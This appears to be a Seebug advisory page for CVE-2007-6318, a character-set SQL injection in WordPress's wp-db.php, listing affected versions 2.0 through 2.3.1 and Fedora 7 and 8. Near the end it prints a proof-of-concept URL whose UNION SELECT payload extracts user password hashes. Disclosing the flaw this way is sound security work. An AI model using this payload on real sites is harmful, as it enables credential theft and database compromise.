WordPress wp-db.php Character Set SQL Injection Vulnerability

2008-01-0600:00:00

Root

www.seebug.org

0.004 Low

EPSS

Percentile

70.4%

JSON

CVE-2007-6318

WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

WordPress WordPress 2.3.1
WordPress WordPress 2.2.3
WordPress WordPress 2.2.2
WordPress WordPress 2.2.1
WordPress WordPress 2.2.1
WordPress WordPress 2.1.3
WordPress WordPress 2.1.3
WordPress WordPress 2.1.2
WordPress WordPress 2.1.1
WordPress WordPress 2.0.10
WordPress WordPress 2.0.7
WordPress WordPress 2.0.6
WordPress WordPress 2.0.5
WordPress WordPress 2.0.4
WordPress WordPress 2.0.3
WordPress WordPress 2.0.2
WordPress WordPress 2.0.1
WordPress WordPress 2.0
WordPress WordPress 2.3
WordPress WordPress 2.2 Revision 5003
WordPress WordPress 2.2 Revision 5002
WordPress WordPress 2.2
WordPress WordPress 2.1.3-RC2
WordPress WordPress 2.1.3-RC1
WordPress WordPress 2.1
WordPress WordPress 2.0.10-RC2
WordPress WordPress 2.0.10-RC1
RedHat Fedora 8 0
RedHat Fedora 7 0

官方暂无
请参阅参考资料，为厂商警告。


                                                The&nbsp;following&nbsp;proof-of-concept&nbsp;exploit&nbsp;is&nbsp;available:

http://www.example.com/wordpress/index.php?exact=1&amp;amp;sentence=1&amp;amp;s=%b3%27)))/**/AND/**/ID=-1/**/UNION/**/SELECT/**/1,2,3,4,5,user_pass,7,8,9,10,

0.004 Low

EPSS

Percentile

70.4%

JSON

Related for SSV:2773